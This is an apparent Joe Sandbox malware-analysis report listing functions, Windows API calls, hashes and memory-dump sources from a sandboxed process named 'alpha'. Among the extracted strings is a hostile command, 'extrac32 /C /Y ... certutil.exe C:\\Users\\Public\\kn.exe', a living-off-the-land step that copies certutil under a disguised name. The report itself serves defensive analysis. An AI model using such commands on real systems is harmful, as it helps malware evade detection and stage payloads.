                                                                    • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                    • Instruction ID: 40e386e2fd88e3baaea8b08d2158d9b9d06e6b14d1fdd7989299d8ad0b689e0d
                                                                    • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                    • Instruction Fuzzy Hash: 90917221A08F52CAFB15BF60E8111BDE6B2AF49B6CB845135DA0E56695DF3CA44E8330
                                                                    APIs
                                                                      • Part of subcall function 00007FF719673578: _get_osfhandle.MSVCRT ref: 00007FF719673584
                                                                      • Part of subcall function 00007FF719673578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF71967359C
                                                                      • Part of subcall function 00007FF719673578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735C3
                                                                      • Part of subcall function 00007FF719673578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735D9
                                                                      • Part of subcall function 00007FF719673578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735ED
                                                                      • Part of subcall function 00007FF719673578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF719673602
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF7196632F3
                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF7196632A4), ref: 00007FF719663309
                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF719663384
                                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7196811DF
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                    • String ID:
                                                                    • API String ID: 611521582-0
                                                                    • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                    • Instruction ID: 2cace691539c7cc0a2a07b20052573a2cb9aa82beac558a841e84aec7e07f9d3
                                                                    • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                    • Instruction Fuzzy Hash: 5DA18032B08E52CAEB14AF61A8446BDE6B2FB49B6DF855135CD0E47784DF3C944A8630
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                                                    • String ID: \\?\
                                                                    • API String ID: 628682198-4282027825
                                                                    • Opcode ID: ab4f5c44bb3b2f47c3e9ebd780c12a08782b375ce868dac15c085b2dd5d8372f
                                                                    • Instruction ID: 6e1fd2da29af1174bce0326aee31439055a5316ef0657c5bd790876047a85e53
                                                                    • Opcode Fuzzy Hash: ab4f5c44bb3b2f47c3e9ebd780c12a08782b375ce868dac15c085b2dd5d8372f
                                                                    • Instruction Fuzzy Hash: CBE1A222A08A82D6EB64AF64D8502F9A7B2FB4576DF805135DA0E477D4DE3CE54AC320
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                                                                    • String ID:
                                                                    • API String ID: 16309207-0
                                                                    • Opcode ID: 19f7487062f5412cc71b33675df9748e948d815796b78eae70ebb84bfe4e28a0
                                                                    • Instruction ID: 45c7bbe057de3b839b69bba49c0d8092d50667cfa7f0be5960b7a0f5611481ce
                                                                    • Opcode Fuzzy Hash: 19f7487062f5412cc71b33675df9748e948d815796b78eae70ebb84bfe4e28a0
                                                                    • Instruction Fuzzy Hash: 9B22A462B04F82C6EB64AF25D8552F9A3B2FF457A8F805135DA0E47795DF3CE14A8320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                                    • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                    • API String ID: 3863671652-4137775220
                                                                    • Opcode ID: 7af4bee894cdf625162c68b6ef6d8248d7a9208546f4bac6ad7e1d8ad21b980b
                                                                    • Instruction ID: 528f5df62ff2254e7b97441dc1506c0a54b030722950f6293835620b6f8d5000
                                                                    • Opcode Fuzzy Hash: 7af4bee894cdf625162c68b6ef6d8248d7a9208546f4bac6ad7e1d8ad21b980b
                                                                    • Instruction Fuzzy Hash: 02E16B21E09E8286FA64BF159864379E6B2AF457A8FC54135DA0D063D5DF3CE84FC630
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                    • String ID: $Application$System
                                                                    • API String ID: 3538039442-1881496484
                                                                    • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                    • Instruction ID: 5ec6896373b7cec3f5b81a6b8835f6b3bff28dac51e0f518dd8f0532d0092f0a
                                                                    • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                    • Instruction Fuzzy Hash: F2517D32A09F41D6EB20AF15B41067AFAB2FB89B68F859134DA4E47754DF3CD44AC720
                                                                    APIs
                                                                    • longjmp.MSVCRT(?,?,00000000,00007FF71968048E), ref: 00007FF71968DA58
                                                                    • memset.MSVCRT ref: 00007FF71968DAD6
                                                                    • memset.MSVCRT ref: 00007FF71968DAFC
                                                                    • memset.MSVCRT ref: 00007FF71968DB22
                                                                      • Part of subcall function 00007FF719673A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF71968EAC5,?,?,?,00007FF71968E925,?,?,?,?,00007FF71966B9B1), ref: 00007FF719673A56
                                                                      • Part of subcall function 00007FF719665194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF7196651C4
                                                                      • Part of subcall function 00007FF71967823C: FindFirstFileExW.KERNELBASE ref: 00007FF719678280
                                                                      • Part of subcall function 00007FF71967823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF71967829D
                                                                      • Part of subcall function 00007FF7196701B8: _get_osfhandle.MSVCRT ref: 00007FF7196701C4
                                                                      • Part of subcall function 00007FF7196701B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF71967E904,?,?,?,?,00000000,00007FF719673491,?,?,?,00007FF719684420), ref: 00007FF7196701D6
                                                                      • Part of subcall function 00007FF719664FE8: _get_osfhandle.MSVCRT ref: 00007FF719665012
                                                                      • Part of subcall function 00007FF719664FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF719665030
                                                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF71968DDB0
                                                                      • Part of subcall function 00007FF7196659E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF719665A2E
                                                                      • Part of subcall function 00007FF7196659E4: _open_osfhandle.MSVCRT ref: 00007FF719665A4F
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF71968DDEB
                                                                    • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF71968DDFA
                                                                    • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF71968E204
                                                                    • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF71968E223
                                                                    • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF71968E242
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                                                                    • String ID: %9d$%s$~
                                                                    • API String ID: 3651208239-912394897
                                                                    • Opcode ID: ab2ad948d6a97cdcb1dc93790fda6d9a1dccb8bf0f4939a4d6f77afca15fad3e
                                                                    • Instruction ID: 9e71509b1644f4596a642df7ae623e68d236e8c873e4852cf84f6da67f69807a
                                                                    • Opcode Fuzzy Hash: ab2ad948d6a97cdcb1dc93790fda6d9a1dccb8bf0f4939a4d6f77afca15fad3e
                                                                    • Instruction Fuzzy Hash: 11425F31A08B82C6EB64BF21D8511E9F7B2FB85768F900136D64D47A99DF3CE54A8730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                    • String ID: COPYCMD$\
                                                                    • API String ID: 3989487059-1802776761
                                                                    • Opcode ID: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                    • Instruction ID: b9e6c9672d2b43c14eef241d9111ab8831d8e629b5b2967024e1c2745100e7a3
                                                                    • Opcode Fuzzy Hash: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                    • Instruction Fuzzy Hash: 5AF1A265A08B46C6EA14AF1594016BAE3B2FF55BACF848135DA4E07794EE3CE44A8330
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Time$File$System$FormatInfoLocalLocale
                                                                    • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                                                    • API String ID: 55602301-2548490036
                                                                    • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                    • Instruction ID: 0bdf27c4cd36b1eb0cee695654963aa39729e725c573ea272691e669a8ce836f
                                                                    • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                    • Instruction Fuzzy Hash: B5A19332A18A4296EB15AF10E8405B9F7B6FB44768FD00135DA4E476A4EF3CE54EC730
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                                                    • String ID:
                                                                    • API String ID: 3935429995-0
                                                                    • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                    • Instruction ID: 29774f716cb7938f658158c681cd9aa2d0fe7c49442f40379ebeab0d5e2cefda
                                                                    • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                    • Instruction Fuzzy Hash: B361D422A18A52CAE714AF11A404579FBB2FF89F68F965174DE4A47790DF3CD40A8720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 41fbdc0f45981392a8be1ae3f0b798cbf48c2336bf4ed7969cfd2cedfd2f237f
                                                                    • Instruction ID: 58a4f55e1f82cc9224aeb4329b9ba207700407b689f740d2cc69a0ff9a3a1f9c
                                                                    • Opcode Fuzzy Hash: 41fbdc0f45981392a8be1ae3f0b798cbf48c2336bf4ed7969cfd2cedfd2f237f
                                                                    • Instruction Fuzzy Hash: 5691C132608B82CAEB28AF25D5106F9F6B2FB4976CF815135DA4E46794DF3CD54AC230
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _get_osfhandlememset$wcschr
                                                                    • String ID: DPATH
                                                                    • API String ID: 3260997497-2010427443
                                                                    • Opcode ID: 3d336d0508f9d51260e4716dc0b75001e2ca59ffb0876634830191a582af1c3b
                                                                    • Instruction ID: 4de9d130fb10379841aa7d95882d52f3fdd2fbfa9cebbc745e24168c3c045676
                                                                    • Opcode Fuzzy Hash: 3d336d0508f9d51260e4716dc0b75001e2ca59ffb0876634830191a582af1c3b
                                                                    • Instruction Fuzzy Hash: 40D15C32A08E4286EB24AF65D4501BDA2B2FB45BACF844235DA1D477D4DF3CE84B8770
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                    • String ID: @P
                                                                    • API String ID: 1801357106-3670739982
                                                                    • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                    • Instruction ID: eff78ea9fe84b913a082caf6980a58162e7e27de7d995f90f5dd9f2398c748f4
                                                                    • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                    • Instruction Fuzzy Hash: DD415C32B04A46DFE710AF60E4402EDABB1FB8976CF845231DA0D56A88DF78D509C760
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$BufferConsoleInfoScreen
                                                                    • String ID:
                                                                    • API String ID: 1034426908-0
                                                                    • Opcode ID: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                                    • Instruction ID: ac143f91373b63a338a60c1cfe7c3372f5c0a21805e5959649cdf2673d4f011a
                                                                    • Opcode Fuzzy Hash: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                                    • Instruction Fuzzy Hash: E2F1A332A08F828AEB24EF21D8512E9A7B6FF4576CF804135DA4D47695DF3CE54AC720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CloseValue$CreateDeleteOpen
                                                                    • String ID: %s=%s$\Shell\Open\Command
                                                                    • API String ID: 4081037667-3301834661
                                                                    • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                    • Instruction ID: 0ea230b52b7db2bc2d95a92205bd7b5d61317e84b20a636a490a3fd84a6e8fd2
                                                                    • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                    • Instruction Fuzzy Hash: 3671AF21A09F42C6EA20AF55A0552BDE2B6FF857A8FC44531DE4E07B84DF3CE44A9730
                                                                    APIs
                                                                    • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF71968AA85
                                                                    • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF71968AACF
                                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF71968AAEC
                                                                    • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7196898C0), ref: 00007FF71968AB39
                                                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7196898C0), ref: 00007FF71968AB6F
                                                                    • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7196898C0), ref: 00007FF71968ABA4
                                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7196898C0), ref: 00007FF71968ABCB
                                                                    Strings
                                                                    Memory Dump Source
